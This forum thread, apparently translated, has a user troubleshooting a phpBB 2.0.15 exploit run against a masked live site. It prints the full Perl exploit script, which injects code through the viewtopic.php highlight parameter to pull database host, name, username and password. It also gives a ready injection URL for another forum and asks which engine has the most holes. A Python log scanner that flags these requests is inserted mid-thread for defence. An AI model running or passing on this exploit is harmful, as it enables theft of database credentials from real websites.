Question about the phpBB <= 2.0.15 exploit
```text
C:\Documents and Settings\M@rtein>spl.pl www.***.com /forums/ 10866
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit                  |
| By SecureD gvr.secured<AT>gmail<DOT>com                                |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host:
[+] Database Name:
[+] Username:
[+] Password:

C:\Documents and Settings\M@rtein>
```

Can you tell me what's wrong? Maybe something needs to be fixed somewhere in the exploit code?
Quote:
==========================
So is your exploit private? Or are you saving on traffic? Or do you have some other reason not to post it here!?
----------------------------------------------
No, I do understand, of course, that you can go to milw0rm and, among the exploits for this version, find the one that has the line "By SecureD gvr.secured<AT>gmail<DOT>com" :D :D :D
Somehow that didn't occur to me =(
```perl
#!/usr/bin/perl
# tested and working /str0ke
#
# phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
# This exploit gives the user all the details about the database
# connection such as database host, username, password and
# database name.
#
# Written by SecureD, gvr.secured<AT>gmail<DOT>com, 2005
#
# Greetings to GvR, Jumento, PP, CKrew & friends

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit                  |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com                                |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3) {
    print "Usage:\r\n";
    print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
    print "SERVER       - Server where PhpBB is installed.\r\n";
    print "DIR          - PHPBB directory or / for no directory.\r\n";
    print "THREADID     - Id of an existing thread.\r\n";
    print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
    print "               Use this when a thread needs authentication for viewing\r\n";
    print "               You can use Firefox in combination with \"Live HTTP\r\n";
    print "               Headers\" to get this cookiestring.\r\n\r\n";
    print "Example 1 (with cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\"\r\n\r\n";
    print "Example 2 (without cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20\r\n";
    exit();
}

$serv     = $ARGV[0];
$dir      = $ARGV[1];
$threadid = $ARGV[2];
$cookie   = $ARGV[3];
$serv =~ s/http:\/\///ge;

# Marker printed around each value so the response can be parsed.
$delimit = "GvRSecureD";

# Request URI: the highlight parameter carries the injected printf().
$sploit  = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$serv", PeerPort => "80")
    or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if (defined $cookie) {
    print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";

$succes = 0;
while ($answer = <$sock>) {
    $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
        $succes = 1;
        $urlIndex = index $answer, "href";
        if ($urlIndex < 0) {
            # Drop the leading marker, then collect every marker-separated
            # field (host, name, user, password) into @array.
            $answer = substr($answer, length($delimit));
            $length = 0;
            while (length($answer) > 0) {
                $nex = index($answer, $delimit);
                if ($nex > 0) {
                    push(@array, substr($answer, 0, $nex));
                    $answer = substr($answer, $nex + length($delimit), length($answer));
                } else {
                    $answer = "";
                }
            }
        }
    }
}
close($sock);

if ($succes == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host: " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name: " . $array[1] . "\n";
    sleep(1);
    print "[+] Username:      " . $array[2] . "\n";
    sleep(1);
    print "[+] Password:      " . $array[3] . "\n";
    sleep(1);
} else {
    print "FAILED\n";
}

# milw0rm.com [2005-07-03]
```
Nothing needs fixing, it just doesn't work on the site where you're using it!
Try this one, http://milw0rm.com/exploits/1076, or simply http://xaked.com/forum/viewtopic.php?t=[topic_number]&highlight=%%27. I.e. essentially the same bug existed in version 2.0.10 %27))_
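As an added example, not from this thread or from the exploit's author: a Python check that scans web-server access-log lines for viewtopic.php requests whose highlight value decodes to a single quote, which covers both the raw `'.printf(...)` payload the script above sends and the `%%27` / double-encoded forms this reply refers to. The log lines, client IPs and paths are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Common Log Format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jul/2005:22:57:01 +0400] "GET /forums/viewtopic.php?t=10866&highlight=phpbb HTTP/1.1" 200 5123
10.0.0.6 - - [03/Jul/2005:22:57:02 +0400] "GET /forums/viewtopic.php?t=10866&highlight='.printf(GvRSecureD.$dbhost.GvRSecureD).' HTTP/1.1" 200 5210
10.0.0.7 - - [03/Jul/2005:22:57:03 +0400] "GET /forum/viewtopic.php?t=12&highlight=%2527 HTTP/1.1" 200 4900
10.0.0.8 - - [03/Jul/2005:22:57:04 +0400] "GET /forums/viewtopic.php?t=12&highlight=%%27 HTTP/1.1" 200 4900
10.0.0.9 - - [03/Jul/2005:22:57:05 +0400] "GET /forums/index.php HTTP/1.1" 200 3000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def decode_rounds(value: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times, stopping once nothing changes.
    One round turns %%27 into %', two rounds turn %2527 into a bare quote."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def highlight_injection(uri: str) -> bool:
    """True when a viewtopic.php request has a highlight value that decodes
    to a single quote, the character needed to break out of the quoted string."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/viewtopic.php"):
        return False
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "highlight" and "'" in decode_rounds(value):
            return True
    return False


def scan_log(log_text: str) -> list:
    """Return (client_ip, request_uri) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and highlight_injection(match.group("uri")):
            hits.append((line.split(" ", 1)[0], match.group("uri")))
    return hits
```

Calling `scan_log(SAMPLE_LOG)` flags the three injected requests and leaves the plain `highlight=phpbb` search alone.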
I downloaded 2.0.13 from sourceforge, it doesn't work at all!
Can you write out the address, how do I get phpinfo() to show? And by the way, which engine is the most hole-ridden right now?
bump